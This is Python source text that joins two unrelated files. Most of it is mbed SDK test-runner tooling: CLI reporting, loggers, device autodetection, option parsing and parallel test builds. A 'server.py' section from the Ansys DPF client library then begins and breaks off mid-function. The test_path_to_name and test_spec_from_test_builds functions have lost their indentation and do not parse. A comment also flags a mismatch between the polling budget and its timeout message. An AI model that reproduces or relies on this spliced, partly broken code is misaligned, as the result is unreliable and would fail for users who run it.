            percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
            str_progress = progress_bar(percent_progress, 75)
            row = [unique_id,
                   counter_dict_test_id_types[unique_id],
                   counter_dict_test_id_types_all[unique_id],
                   percent_progress,
                   "[" + str_progress + "]"]
            pt.add_row(row)
        result += "Test automation coverage:\n"
        result += pt.get_string()
        result += "\n\n"
    return result
def progress_bar(percent_progress, saturation=0):
    """ Create a 50-character '#'/'.' progress bar with an optional saturation
        marker inserted at 'saturation' percent.

    @param percent_progress progress value in percent (0-100)
    @param saturation when > 0, percent position where a marker is inserted:
           '|' if progress already passed the 3/4 point, '!' otherwise
    @return the rendered bar string
    """
    step = int(percent_progress / 2)    # Scale percent to bar cells (1 - 50)
    str_progress = '#' * step + '.' * int(50 - step)
    c = '!' if str_progress[38] == '.' else '|'
    if saturation > 0:
        # Floor division: keeps the slice index an int under Python 3 as well
        # (plain '/' would produce a float and raise TypeError when slicing)
        saturation = saturation // 2
        str_progress = str_progress[:saturation] + c + str_progress[saturation:]
    return str_progress
def singletest_in_cli_mode(single_test):
    """ Runs SingleTestRunner object in CLI (Command line interface) mode

    @param single_test configured SingleTestRunner instance
    @return returns success code (0 == success) for building and running tests
    """
    start = time()
    # Execute tests depending on options and filter applied
    test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
    elapsed_time = time() - start

    # Human readable summary
    if not single_test.opts_suppress_summary:
        # prints well-formed summary with results (SQL table like)
        print single_test.generate_test_summary(test_summary, shuffle_seed)
    if single_test.opts_test_x_toolchain_summary:
        # prints well-formed summary with results (SQL table like)
        # table shows text x toolchain test result matrix
        print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)

    print "Completed in %.2f sec"% (elapsed_time)
    print
    # Write summary of the builds
    print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
    status = print_report_exporter.report(build_report)

    # Store extra reports in files
    if single_test.opts_report_html_file_name:
        # Export results in form of HTML report to separate file
        report_exporter = ReportExporter(ResultExporterType.HTML)
        report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
    if single_test.opts_report_junit_file_name:
        # Export results in form of JUnit XML report to separate file
        report_exporter = ReportExporter(ResultExporterType.JUNIT)
        report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
    if single_test.opts_report_text_file_name:
        # Export results in form of a text file
        report_exporter = ReportExporter(ResultExporterType.TEXT)
        report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
    if single_test.opts_report_build_file_name:
        # Export build results as html report to sparate file
        report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
        report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)

    # Returns True if no build failures of the test projects or their dependencies
    return status
class TestLogger():
    """ Base class for logging / printing events during a test-suite run.
    """
    def __init__(self, store_log=True):
        """ Initialize the logger.

        @param store_log when True, every entry is kept in self.log; when
               False entries are only returned to the caller
        """
        self.log = []               # in-memory list of log entry dicts
        self.log_to_file = False
        self.log_file_name = None
        self.store_log = store_log

        # Enumerations used by subclasses / callers
        self.LogType = construct_enum(INFO='Info',
                                      WARN='Warning',
                                      NOTIF='Notification',
                                      ERROR='Error',
                                      EXCEPT='Exception')

        self.LogToFileAttr = construct_enum(CREATE=1,   # Create or overwrite existing log file
                                            APPEND=2)   # Append to existing log file

    def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
        """ Record one line of text; returns the created log entry dict.
        """
        entry = {
            'log_type': LogType,
            'log_timestamp': time(),
            'log_line': log_line,
            '_future': None,
        }
        # Store log in memory only when configured to do so
        if self.store_log:
            self.log.append(entry)
        return entry
class CLITestLogger(TestLogger):
    """ Logger used with CLI (Command line interface) test suite.
        Prints formatted entries and appends them to a file when configured.
    """
    def __init__(self, store_log=True, file_name=None):
        """ @param store_log forwarded to TestLogger (keep entries in memory)
            @param file_name optional log file to append every entry to
        """
        # Forward store_log to the base class; the original called
        # TestLogger.__init__(self) and silently ignored this parameter
        TestLogger.__init__(self, store_log=store_log)
        self.log_file_name = file_name
        #self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
        self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only

    def log_print(self, log_entry, timestamp=True):
        """ Return the log entry formatted for screen, optionally prefixed
            with '[HH:MM:SS] '.
        """
        ts = log_entry['log_timestamp']
        timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
        log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
        return timestamp_str + log_line_str

    def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
        """ Log a line via the base class; when a log file was configured the
            formatted line is also appended there (IOErrors are ignored).
        """
        log_entry = TestLogger.log_line(self, LogType, log_line)
        log_line_str = self.log_print(log_entry, timestamp)
        if self.log_file_name is not None:
            try:
                with open(self.log_file_name, 'a') as f:
                    f.write(log_line_str + line_delim)
            except IOError:
                # Best effort: a failed file write must not abort the test run
                pass
        return log_line_str
def factory_db_logger(db_url):
    """ Create a database driver based on the type encoded in the database
        connection string 'db_url'.

    @param db_url connection string, e.g. 'mysql://user:pass@host/db', or None
    @return driver instance (currently only MySQLDBAccess) or None when the
            URL is missing, unparsable, or of an unknown type
    """
    if db_url is not None:
        from tools.test_mysql import MySQLDBAccess
        connection_info = BaseDBAccess().parse_db_connection_string(db_url)
        if connection_info is not None:
            # Reuse the already-parsed tuple; the original parsed the URL a
            # second time, constructing a redundant BaseDBAccess object
            (db_type, username, password, host, db_name) = connection_info
            if db_type == 'mysql':
                return MySQLDBAccess()
    return None
def detect_database_verbose(db_url):
    """ Verbosely (with prints) check that a database connection string is
        valid: parse it, connect, probe the database, and disconnect.

    @param db_url database connection string to validate
    """
    result = BaseDBAccess().parse_db_connection_string(db_url)
    if result is not None:
        # Parsing passed
        (db_type, username, password, host, db_name) = result
        #print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
        # Let's try to connect
        db_ = factory_db_logger(db_url)
        if db_ is not None:
            print "Connecting to database '%s'..."% db_url,
            db_.connect(host, username, password, db_name)
            if db_.is_connected():
                print "ok"
                print "Detecting database..."
                print db_.detect_database(verbose=True)
                print "Disconnecting...",
                db_.disconnect()
                print "done"
        else:
            print "Database type '%s' unknown"% db_type
    else:
        print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
    """ Return True if module 'module_name' is already an imported module.

    Membership is tested on sys.modules directly instead of materializing
    its key list first.
    """
    return module_name in sys.modules
def get_autodetected_MUTS_list(platform_name_filter=None):
    """ Detect connected mbed devices via mbed_lstools and return them as an
        artificial MUTs dictionary (see get_autodetected_MUTS).

    @param platform_name_filter optional list of platform names to keep
    """
    oldError = None
    if os.name == 'nt':
        # Disable Windows error box temporarily
        oldError = ctypes.windll.kernel32.SetErrorMode(1) # note that SEM_FAILCRITICALERRORS = 1

    mbeds = mbed_lstools.create()
    detect_muts_list = mbeds.list_mbeds()

    if os.name == 'nt':
        # Restore the previous Windows error mode
        ctypes.windll.kernel32.SetErrorMode(oldError)

    return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
    """ Convert an mbed_lstools device list into a MUTs dictionary in the
        muts_all.json format. Returns an empty dict when nothing matches.

    Example input element:
        {'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:',
         'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}

    @param mbeds_list list of device dicts captured from mbed_lstools
    @param platform_name_filter optional list of platform names to keep
    @return dict {1: mut_dict, 2: mut_dict, ...}
    """
    muts = {}   # Should be in muts_all.json format
    slot = 1
    for dev in mbeds_list:
        # Filter the MUTS if a filter is specified
        if platform_name_filter and dev['platform_name'] not in platform_name_filter:
            continue
        # 'mcu_unique' comes from mbedls when available; otherwise derive it
        # from the last few characters of the platform's target_id
        if 'platform_name_unique' in dev:
            unique_name = dev['platform_name_unique']
        else:
            unique_name = "%s[%s]" % (dev['platform_name'], dev['target_id'][-4:])
        muts[slot] = {
            'mcu': dev['platform_name'],
            'mcu_unique': unique_name,
            'port': dev['serial_port'],
            'disk': dev['mount_point'],
            'peripherals': []   # No peripheral detection
        }
        slot += 1
    return muts
def get_autodetected_TEST_SPEC(mbeds_list,
                               use_default_toolchain=True,
                               use_supported_toolchains=False,
                               toolchain_filter=None,
                               platform_name_filter=None):
    """ Build an artificial test_spec structure from detected mbed devices.
        Devices with MCUs unknown to TARGET_MAP are skipped; when nothing
        matches, {'targets': {}} is returned.

    @param mbeds_list list of MUT dicts (each with an 'mcu' key)
    @param use_default_toolchain add the target's default toolchain
    @param use_supported_toolchains add every toolchain the target supports
    @param toolchain_filter additionally add listed toolchains when the
           target knows them (default or supported)
    @param platform_name_filter keep only these platform names (None = all)
    """
    test_spec = {'targets': {}}
    for dev in mbeds_list:
        mcu = dev['mcu']
        # Guard clauses replace the original nested conditionals; an empty
        # (non-None) filter still rejects everything, as before
        if platform_name_filter is not None and dev['mcu'] not in platform_name_filter:
            continue
        if mcu not in TARGET_MAP:
            continue

        default_toolchain = TARGET_MAP[mcu].default_toolchain
        supported_toolchains = TARGET_MAP[mcu].supported_toolchains

        # Decide which toolchains should be added to test specification toolchain pool for each target
        pool = []
        if use_default_toolchain:
            pool.append(default_toolchain)
        if use_supported_toolchains:
            pool.extend(supported_toolchains)
        if toolchain_filter is not None:
            known = supported_toolchains + [default_toolchain]
            pool.extend(tc for tc in toolchain_filter if tc in known)
        test_spec['targets'][mcu] = list(set(pool))
    return test_spec
def get_default_test_options_parser():
    """ Get common test script options used by CLI, web services etc.

    Builds and returns an ``argparse.ArgumentParser`` pre-populated with
    every option understood by the test suite.  Options that need the
    optional ``mbed_lstools`` module (device auto-detection, toolchain
    filtering for --auto, interoperability checks) are only registered
    when that module is importable on the host.
    """
    parser = argparse.ArgumentParser()
    # Test/MUT specification inputs
    parser.add_argument('-i', '--tests',
                        dest='test_spec_filename',
                        metavar="FILE",
                        type=argparse_filestring_type,
                        help='Points to file with test specification')
    parser.add_argument('-M', '--MUTS',
                        dest='muts_spec_filename',
                        metavar="FILE",
                        type=argparse_filestring_type,
                        help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
    parser.add_argument("-j", "--jobs",
                        dest='jobs',
                        metavar="NUMBER",
                        type=int,
                        help="Define number of compilation jobs. Default value is 1")
    if get_module_avail('mbed_lstools'):
        # Additional features available when mbed_lstools is installed on host and imported
        # mbed_lstools allow users to detect connected to host mbed-enabled devices
        parser.add_argument('--auto',
                            dest='auto_detect',
                            action="store_true",
                            help='Use mbed-ls module to detect all connected mbed devices')
        toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
        parser.add_argument('--tc',
                            dest='toolchains_filter',
                            type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
                            help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
        test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
        parser.add_argument('--oper',
                            dest='operability_checks',
                            type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
                            help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
    # Build/test selection switches
    parser.add_argument('--clean',
                        dest='clean',
                        action="store_true",
                        help='Clean the build directory')
    parser.add_argument('-P', '--only-peripherals',
                        dest='test_only_peripheral',
                        default=False,
                        action="store_true",
                        help='Test only peripheral declared for MUT and skip common tests')
    parser.add_argument("--profile", dest="profile", action="append",
                        type=argparse_filestring_type,
                        default=[])
    parser.add_argument('-C', '--only-commons',
                        dest='test_only_common',
                        default=False,
                        action="store_true",
                        help='Test only board internals. Skip perpherials tests and perform common tests')
    parser.add_argument('-n', '--test-by-names',
                        dest='test_by_names',
                        type=argparse_many(str),
                        help='Runs only test enumerated it this switch. Use comma to separate test case names')
    parser.add_argument('-p', '--peripheral-by-names',
                        dest='peripheral_by_names',
                        type=argparse_many(str),
                        help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
    # Flash/reset plugin selection (choices come from the host test plugin registry)
    copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
    copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
    parser.add_argument('-c', '--copy-method',
                        dest='copy_method',
                        type=argparse_uppercase_type(copy_methods, "flash method"),
                        help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
    reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
    reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
    parser.add_argument('-r', '--reset-type',
                        dest='mut_reset_type',
                        default=None,
                        type=argparse_uppercase_type(reset_methods, "reset method"),
                        help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
    parser.add_argument('-g', '--goanna-for-tests',
                        dest='goanna_for_tests',
                        action="store_true",
                        help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
    parser.add_argument('-G', '--goanna-for-sdk',
                        dest='goanna_for_mbed_sdk',
                        action="store_true",
                        help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
    # Reporting and output control
    parser.add_argument('-s', '--suppress-summary',
                        dest='suppress_summary',
                        default=False,
                        action="store_true",
                        help='Suppresses display of wellformatted table with test results')
    parser.add_argument('-t', '--test-summary',
                        dest='test_x_toolchain_summary',
                        default=False,
                        action="store_true",
                        help='Displays wellformatted table with test x toolchain test result per target')
    parser.add_argument('-A', '--test-automation-report',
                        dest='test_automation_report',
                        default=False,
                        action="store_true",
                        help='Prints information about all tests and exits')
    parser.add_argument('-R', '--test-case-report',
                        dest='test_case_report',
                        default=False,
                        action="store_true",
                        help='Prints information about all test cases and exits')
    parser.add_argument("-S", "--supported-toolchains",
                        action="store_true",
                        dest="supported_toolchains",
                        default=False,
                        help="Displays supported matrix of MCUs and toolchains")
    parser.add_argument("-O", "--only-build",
                        action="store_true",
                        dest="only_build_tests",
                        default=False,
                        help="Only build tests, skips actual test procedures (flashing etc.)")
    parser.add_argument('--parallel',
                        dest='parallel_test_exec',
                        default=False,
                        action="store_true",
                        help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
    parser.add_argument('--config',
                        dest='verbose_test_configuration_only',
                        default=False,
                        action="store_true",
                        help='Displays full test specification and MUTs configration and exits')
    # Loop / repetition control
    parser.add_argument('--loops',
                        dest='test_loops_list',
                        type=argparse_many(str),
                        help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
    parser.add_argument('--global-loops',
                        dest='test_global_loops_value',
                        type=int,
                        help='Set global number of test loops per test. Default value is set 1')
    parser.add_argument('--consolidate-waterfall',
                        dest='consolidate_waterfall_test',
                        default=False,
                        action="store_true",
                        help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
    parser.add_argument('-W', '--waterfall',
                        dest='waterfall_test',
                        default=False,
                        action="store_true",
                        help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
    parser.add_argument('-N', '--firmware-name',
                        dest='firmware_global_name',
                        help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
    # Test execution order
    parser.add_argument('-u', '--shuffle',
                        dest='shuffle_test_order',
                        default=False,
                        action="store_true",
                        help='Shuffles test execution order')
    parser.add_argument('--shuffle-seed',
                        dest='shuffle_test_seed',
                        default=None,
                        help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
    parser.add_argument('-f', '--filter',
                        dest='general_filter_regex',
                        type=argparse_many(str),
                        default=None,
                        help='For some commands you can use filter to filter out results')
    parser.add_argument('--inc-timeout',
                        dest='extend_test_timeout',
                        metavar="NUMBER",
                        type=int,
                        help='You can increase global timeout for each test by specifying additional test timeout in seconds')
    # Result persistence / report formats
    parser.add_argument('--db',
                        dest='db_url',
                        help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
    parser.add_argument('-l', '--log',
                        dest='log_file_name',
                        help='Log events to external file (note not all console entries may be visible in log file)')
    parser.add_argument('--report-html',
                        dest='report_html_file_name',
                        help='You can log test suite results in form of HTML report')
    parser.add_argument('--report-junit',
                        dest='report_junit_file_name',
                        help='You can log test suite results in form of JUnit compliant XML report')
    parser.add_argument("--report-build",
                        dest="report_build_file_name",
                        help="Output the build results to a junit xml file")
    parser.add_argument("--report-text",
                        dest="report_text_file_name",
                        help="Output the build results to a text file")
    # Verbosity switches
    parser.add_argument('--verbose-skipped',
                        dest='verbose_skipped_tests',
                        default=False,
                        action="store_true",
                        help='Prints some extra information about skipped tests')
    parser.add_argument('-V', '--verbose-test-result',
                        dest='verbose_test_result_only',
                        default=False,
                        action="store_true",
                        help='Prints test serial output')
    parser.add_argument('-v', '--verbose',
                        dest='verbose',
                        default=False,
                        action="store_true",
                        help='Verbose mode (prints some extra information)')
    parser.add_argument('--version',
                        dest='version',
                        default=False,
                        action="store_true",
                        help='Prints script version and exits')
    return parser
def test_path_to_name(path, base):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(relpath(path,base))
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def find_tests(base_dir, target_name, toolchain_name, app_config=None):
    """ Finds all tests in a directory recursively.

    A test case is any directory exactly two levels below a 'TESTS'
    folder (TESTS/<group>/<case>) where neither the group folder nor the
    case folder is named 'host_tests'.

    base_dir: path to the directory to scan for tests (ex. 'path/to/project')
    target_name: name of the target to use for scanning (ex. 'K64F')
    toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
    app_config - location of a chosen mbed_app.json file

    Returns a dict mapping generated test names to test directories.
    """
    discovered = {}
    # Prepare the toolchain so resource scanning honours target/toolchain rules.
    toolchain = prepare_toolchain([base_dir], target_name, toolchain_name,
                                  silent=True, app_config=app_config)
    resources = scan_resources([base_dir], toolchain)
    for inc_dir in resources.inc_dirs:
        # Only directories that contain a 'TESTS' subfolder are of interest.
        if 'TESTS' not in os.listdir(inc_dir):
            continue
        tests_root = join(inc_dir, 'TESTS')
        scanned = toolchain.scan_resources(tests_root, base_path=base_dir)
        for candidate in scanned.inc_dirs:
            # Only folders exactly two levels below TESTS/ qualify as test cases.
            if get_path_depth(relpath(candidate, tests_root)) != 2:
                continue
            group_path, case_name = os.path.split(candidate)
            group_name = os.path.basename(group_path)
            # Host test helper folders are never test cases themselves.
            if case_name == 'host_tests' or group_name == 'host_tests':
                continue
            discovered[test_path_to_name(candidate, base_dir)] = candidate
    return discovered
def print_tests(tests, format="list", sort=True):
    """Given a dictionary of tests (as returned from "find_tests"), print them
    in the specified format.

    tests: dict mapping test names to test paths
    format: 'list' for a human-readable listing, 'json' for JSON output
    sort: kept for interface compatibility (the list output is always sorted)

    Exits the process with status 1 on an unknown format.
    """
    # Single-argument print() calls behave identically on Python 2 and 3,
    # unlike the original print statements which were Python 2 only.
    if format == "list":
        for test_name in sorted(tests.keys()):
            test_path = tests[test_name]
            print("Test Case:")
            print(" Name: %s" % test_name)
            print(" Path: %s" % test_path)
    elif format == "json":
        print(json.dumps(tests, indent=2))
    else:
        print("Unknown format '%s'" % format)
        sys.exit(1)
def norm_relative_path(path, start):
    """This function will create a normalized, relative path. It mimics the
    python os.path.relpath function, but also normalizes a Windows-syle path
    that use backslashes to a Unix style path that uses forward slashes."""
    relative = os.path.relpath(os.path.normpath(path), start)
    return relative.replace("\\", "/")
def build_test_worker(*args, **kwargs):
    """This is a worker function for the parallel building of tests. The `args`
    and `kwargs` are passed directly to `build_project`. It returns a dictionary
    with the following structure:

    {
        'result': `True` if no exceptions were thrown, `False` otherwise
        'reason': Instance of exception that was thrown on failure
        'bin_file': Path to the created binary if `build_project` was
                    successful. Not present otherwise
        'kwargs': The keyword arguments that were passed to `build_project`.
                  This includes arguments that were modified (ex. report)
    }
    """
    ret = {
        'result': False,
        'args': args,
        'kwargs': kwargs
    }

    # Propagate the parent's toolchain locations into this worker process,
    # then strip the helper key so build_project never sees it.
    for key, value in kwargs['toolchain_paths'].items():
        TOOLCHAIN_PATHS[key] = value
    del kwargs['toolchain_paths']

    try:
        bin_file = build_project(*args, **kwargs)
        ret['result'] = True
        ret['bin_file'] = bin_file
        ret['kwargs'] = kwargs
    # 'except X as e' is valid on Python 2.6+ and 3, unlike 'except X, e'.
    except (NotSupportedException, ToolException, KeyboardInterrupt) as e:
        ret['reason'] = e
    except BaseException:
        # Print unhandled exceptions here so the parent can display them;
        # 'reason' deliberately stays unset and 'result' stays False.
        import traceback
        traceback.print_exc(file=sys.stdout)

    return ret
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
                clean=False, notify=None, verbose=False, jobs=1, macros=None,
                silent=False, report=None, properties=None,
                continue_on_build_fail=False, app_config=None,
                build_profile=None):
    """Given the data structure from 'find_tests' and the typical build parameters,
    build all the tests

    tests - dict mapping test names to test directories (see find_tests)
    base_source_paths - list of shared source directories prepended to each test
    continue_on_build_fail - when False, abort remaining builds on first failure
    report/properties - mutable report structures merged with worker results

    Builds run in a multiprocessing Pool via build_test_worker; results are
    polled and merged back into `report` as workers finish.

    Returns a tuple of the build result (True or False) followed by the test
    build data structure"""
    execution_directory = "."
    base_path = norm_relative_path(build_path, execution_directory)

    target_name = target if isinstance(target, str) else target.name
    cfg, macros, features = get_config(base_source_paths, target_name, toolchain_name)

    # Baud rate defaults to 9600 unless the project config overrides it.
    baud_rate = 9600
    if 'platform.stdio-baud-rate' in cfg:
        baud_rate = cfg['platform.stdio-baud-rate'].value

    test_build = {
        "platform": target_name,
        "toolchain": toolchain_name,
        "base_path": base_path,
        "baud_rate": baud_rate,
        "binary_type": "bootable",
        "tests": {}
    }

    result = True

    jobs_count = int(jobs if jobs else cpu_count())
    p = Pool(processes=jobs_count)
    results = []
    # Queue one asynchronous build per test; each worker builds with jobs=1
    # since parallelism comes from the pool itself.
    for test_name, test_path in tests.iteritems():
        test_build_path = os.path.join(build_path, test_path)
        src_path = base_source_paths + [test_path]
        bin_file = None
        test_case_folder_name = os.path.basename(test_path)

        args = (src_path, test_build_path, target, toolchain_name)
        kwargs = {
            'jobs': 1,
            'clean': clean,
            'macros': macros,
            'name': test_case_folder_name,
            'project_id': test_name,
            'report': report,
            'properties': properties,
            'verbose': verbose,
            'app_config': app_config,
            'build_profile': build_profile,
            'silent': True,
            'toolchain_paths': TOOLCHAIN_PATHS
        }

        results.append(p.apply_async(build_test_worker, args, kwargs))
    p.close()
    result = True
    itr = 0
    # Poll for finished workers; 360000 iterations * 0.01s sleep ~= 1 hour of
    # polling budget (the message below says 10 minutes -- TODO confirm which
    # limit is intended).
    while len(results):
        itr += 1
        if itr > 360000:
            p.terminate()
            p.join()
            raise ToolException("Compile did not finish in 10 minutes")
        else:
            sleep(0.01)
            pending = 0
            for r in results:
                if r.ready() is True:
                    try:
                        worker_result = r.get()
                        results.remove(r)

                        # Take report from the kwargs and merge it into existing report
                        report_entry = worker_result['kwargs']['report'][target_name][toolchain_name]
                        for test_key in report_entry.keys():
                            report[target_name][toolchain_name][test_key] = report_entry[test_key]

                        # Set the overall result to a failure if a build failure occurred
                        if not worker_result['result'] and not isinstance(worker_result['reason'], NotSupportedException):
                            result = False
                            break

                        # Adding binary path to test build result
                        if worker_result['result'] and 'bin_file' in worker_result:
                            bin_file = norm_relative_path(worker_result['bin_file'], execution_directory)

                            test_build['tests'][worker_result['kwargs']['project_id']] = {
                                "binaries": [
                                    {
                                        "path": bin_file
                                    }
                                ]
                            }

                            test_key = worker_result['kwargs']['project_id'].upper()
                            print report[target_name][toolchain_name][test_key][0][0]['output'].rstrip()
                            print 'Image: %s\n' % bin_file
                    except:
                        # Drain the pool's private task queue so terminate()
                        # does not hang on queued work, then re-raise.
                        if p._taskqueue.queue:
                            p._taskqueue.queue.clear()
                            sleep(0.5)
                        p.terminate()
                        p.join()
                        raise
                else:
                    pending += 1
                    # Stop scanning once every pool slot is known to be busy.
                    if pending >= jobs_count:
                        break

        # Break as soon as possible if there is a failure and we are not
        # continuing on build failures
        if not result and not continue_on_build_fail:
            if p._taskqueue.queue:
                p._taskqueue.queue.clear()
                sleep(0.5)
            p.terminate()
            break

    p.join()
    test_builds = {}
    test_builds["%s-%s" % (target_name, toolchain_name)] = test_build

    return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
server.py | """
Server
======
Contains the directives necessary to start the DPF server.
"""
from threading import Thread
import io
import platform
import logging
import time
import os
import socket
import subprocess
import grpc
import psutil
import weakref
import atexit
import copy
from ansys import dpf
from ansys.dpf.core.misc import find_ansys, is_ubuntu
from ansys.dpf.core import errors
from ansys.dpf.core._version import __ansys_version__
MAX_PORT = 65535  # highest valid TCP port number
LOG = logging.getLogger(__name__)
LOG.setLevel('DEBUG')
# default DPF server port (overridable via the DPF_PORT environment variable)
DPF_DEFAULT_PORT = int(os.environ.get('DPF_PORT',50054))
# default DPF server IP (overridable via the DPF_IP environment variable)
LOCALHOST = os.environ.get('DPF_IP','127.0.0.1')
def shutdown_global_server():
    """atexit hook: drop the global DPF server (best effort).

    Deleting ``dpf.core.SERVER`` releases this module's reference to the
    server object, which may trigger its ``__del__``/``shutdown``.
    Failures are ignored because this runs during interpreter teardown,
    when parts of the dpf package may already be gone.
    """
    try:
        # 'is not None' instead of '!= None': identity check for None.
        if dpf.core.SERVER is not None:
            del dpf.core.SERVER
    except Exception:
        pass
atexit.register(shutdown_global_server)
def has_local_server():
    """Check if a local DPF gRPC server has been created.

    The global server handle lives in ``dpf.core.SERVER``.

    Returns
    -------
    bool
        ``True`` when a local DPF gRPC server has been created.
    """
    return dpf.core.SERVER is not None
def _global_server():
    """Retrieve the global server, creating or connecting on demand.

    If the global server has not been specified, check if the user
    has specified the "DPF_START_SERVER" environment variable. If
    ``True``, start the server locally. If ``False``, connect to the
    existing server at DPF_IP/DPF_PORT.
    """
    if dpf.core.SERVER is None:
        start_requested = os.environ.get('DPF_START_SERVER', '').lower() != 'false'
        if start_requested:
            start_local_server()
        else:
            connect_to_server(os.environ.get('DPF_IP', LOCALHOST),
                              int(os.environ.get('DPF_PORT', DPF_DEFAULT_PORT)))
    return dpf.core.SERVER
def port_in_use(port, host=LOCALHOST):
    """Check if a port is in use at the given host.

    The port must actually "bind" the address. Just checking to see if a
    socket can be created is insufficient because it's possible to run into
    permission errors like: ``An attempt was made to access a socket in a way
    forbidden by its access permissions.``

    Returns
    -------
    bool
        ``True`` when the port is in use, ``False`` when free.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        try:
            sock.bind((host, port))
        except OSError:
            # Covers both "address in use" and permission errors;
            # socket.error is an alias of OSError on Python 3.  A narrow
            # clause replaces the original bare except, which also
            # swallowed KeyboardInterrupt/SystemExit.
            return True
        return False
def check_valid_ip(ip):
    """Check if a valid IP address is entered.

    Validation is delegated to ``socket.inet_aton``; an invalid IPv4
    address raises ``ValueError``.
    """
    try:
        socket.inet_aton(ip)
    except OSError:
        raise ValueError(f'Invalid IP address "{ip}"')
def shutdown_all_session_servers():
    """Shut down all active servers created by this module."""
    from ansys.dpf.core import _server_instances
    # Work on a deep copy so shutdown() can mutate the live registry.
    for instance in copy.deepcopy(_server_instances):
        try:
            instance().shutdown()
        except Exception as exc:
            print(exc.args)
def start_local_server(ip=LOCALHOST, port=DPF_DEFAULT_PORT,
                       ansys_path=None, as_global=True, load_operators=True):
    """Start a new local DPF server at a given port and IP address.

    This method requires Windows and ANSYS 2021 R1 or later. If
    ``as_global=True`` (the default), the server is stored globally,
    replacing the one stored previously. Otherwise, a user must keep a
    handle on their server.

    Parameters
    ----------
    ip : str, optional
        IP address of the remote or local instance to connect to. The
        default is ``"LOCALHOST"``.
    port : int
        Port to connect to the remote instance on. The default is
        ``"DPF_DEFAULT_PORT"``, which is 50054.
    ansys_path : str, optional
        Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
        The default is the latest Ansys installation.
    as_global : bool, optional
        Global variable that stores the IP address and port for the DPF
        module. All DPF objects created in this Python session will
        use this IP and port. The default is ``True``.
    load_operators : bool, optional
        Whether to automatically load the math operators. The default is ``True``.

    Returns
    -------
    server : server.DpfServer
    """
    if ansys_path is None:
        ansys_path = os.environ.get('AWP_ROOT' + __ansys_version__, find_ansys())
    if ansys_path is None:
        raise ValueError('Unable to automatically locate the Ansys path. '
                         'Manually enter one when starting the server or set it '
                         'as the environment variable "ANSYS_PATH"')

    # verify path exists
    if not os.path.isdir(ansys_path):
        raise NotADirectoryError(f'Invalid Ansys path "{ansys_path}"')

    # parse the version to an int and check for supported
    try:
        ver = int(ansys_path[-3:])
        if ver < 211:
            raise errors.InvalidANSYSVersionError(f'Ansys v{ver} does not support DPF')
        if ver == 211 and is_ubuntu():
            raise OSError('DPF on v211 does not support Ubuntu')
    except ValueError:
        # Path does not end in a 3-digit version; skip the version check.
        pass

    # avoid using any ports in use from existing servers
    used_ports = []
    if dpf.core._server_instances:
        for srv in dpf.core._server_instances:
            if srv():
                used_ports.append(srv().port)
    while port in used_ports:
        port += 1

    # verify port is free
    while port_in_use(port):
        port += 1

    server = None
    n_attempts = 10
    for _ in range(n_attempts):
        try:
            server = DpfServer(ansys_path, ip, port, as_global=as_global,
                               load_operators=load_operators)
            break
        except errors.InvalidPortError:  # allow socket in use errors
            port += 1

    if server is None:
